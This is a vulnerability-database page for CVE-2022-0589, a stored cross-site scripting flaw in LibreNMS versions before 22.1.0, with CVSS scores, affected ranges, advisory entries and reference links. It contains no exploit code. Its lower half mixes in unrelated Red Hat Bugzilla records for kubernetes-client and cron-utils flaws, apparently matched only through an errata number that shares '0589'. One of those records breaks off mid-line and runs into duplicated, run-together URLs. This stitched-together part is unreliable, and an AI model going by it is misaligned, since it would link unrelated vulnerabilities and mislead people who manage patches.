CVE-2022-0589
published 2022-02-15CVE-2022-0589: Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
PriorityP424medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.83%
53.1th percentile
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| librenms | librenms | < 22.1.0 | 22.1.0 |
| librenms | librenms | >= 0 < 22.1.0 | 22.1.0 |
| librenms | librenms_librenms | >= unspecified < 22.1.0 | 22.1.0 |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv3.05.4MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Cross-site Scripting in librenms
ghsa·2022-02-16
CVE-2022-0589 [MEDIUM] CWE-79 Cross-site Scripting in librenms
Cross-site Scripting in librenms
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
OSV
Cross-site Scripting in librenms
osv·2022-02-16
CVE-2022-0589 [MEDIUM] Cross-site Scripting in librenms
Cross-site Scripting in librenms
Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method
bugzilla·2021-12-20·CVSS 6.7
CVE-2021-4178 [MEDIUM] CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method
CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method
A flaw was found in kubernetes-client. An insecure deserialization issue due to the use of the SnakeYAML library may lead to arbitrary code execution.
References:
https://github.com/fabric8io/kubernetes-client/issues/3653
Discussion:
This issue has been addressed in the following products:
Red Hat AMQ Streams 1.6.7
Via RHSA-2022:0467 https://access.redhat.com/errata/RHSA-2022:0467
---
This issue has been addressed in the following products:
Red Hat AMQ Streams 2.0.1
Via RHSA-2022:0469 https://access.redhat.com/errata/RHSA-2022:0469
---
This issue has been addressed in the following products:
Red Hat build of Quarkus 2.2.5
Via RHSA-2022:0589 https://access.redhat.com/errata/RHSA-2022:0589
---
Bugzilla
CVE-2021-41269 cron-utils: template Injection leading to unauthenticated Remote Code Execution
bugzilla·2021-11-18·CVSS 9.8
CVE-2021-41269 [CRITICAL] CVE-2021-41269 cron-utils: template Injection leading to unauthenticated Remote Code Execution
CVE-2021-41269 cron-utils: template Injection leading to unauthenticated Remote Code Execution
A Template Injection was identified in cron-utils enabling attackers to inject arbitrary Java EL expressions, leading to unauthenticated Remote Code Execution (RCE) vulnerability.
Upstream Advisory:
https://github.com/jmrozanec/cron-utils/security/advisories/GHSA-p9m8-27x8-rg87
Discussion:
This issue has been addressed in the following products:
Red Hat build of Quarkus 2.2.5
Via RHSA-2022:0589 https://access.redhat.com/errata/RHSA-2022:0589
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redhat.com/security/cve/cve-2021-41269
---
This issue has been addressed in the following products:
RHINT Camel-Q 2.2.1
Via
https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fahttps://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.htmlhttps://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fahttps://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html
2022-02-15
Published